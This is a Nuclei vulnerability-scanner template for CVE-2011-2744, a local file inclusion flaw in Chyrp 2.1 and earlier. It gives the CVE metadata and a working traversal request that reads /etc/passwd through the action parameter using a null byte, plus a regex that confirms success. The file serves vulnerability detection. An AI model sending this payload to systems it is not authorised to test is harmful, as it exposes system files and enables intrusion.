nuclei-templates/http/cves/2011/CVE-2011-2744.yaml

46 lines
1.7 KiB
YAML

id: CVE-2011-2744
info:
name: Chyrp 2.x - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system.
remediation: |
Upgrade Chyrp to the latest version or apply the necessary patches provided by the vendor.
reference:
- https://www.exploit-db.com/exploits/35945
- http://www.openwall.com/lists/oss-security/2011/07/13/6
- https://nvd.nist.gov/vuln/detail/CVE-2011-2744
- http://securityreason.com/securityalert/8312
- http://www.ocert.org/advisories/ocert-2011-001.html
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2011-2744
cwe-id: CWE-22
epss-score: 0.01541
epss-percentile: 0.87103
cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: chyrp
product: chyrp
tags: cve,cve2011,lfi,chyrp,edb
http:
- method: GET
path:
- "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022009040bc705006390698b4760bf5d68599fa44e8cd4d06e85d1c53f6d78a66bd9022100dad78daa7c9a9543e18b8cce2f178325d4a18cf5db8fe2c2dab043196bea3e04:922c64590222798bb761d5b6d8e72950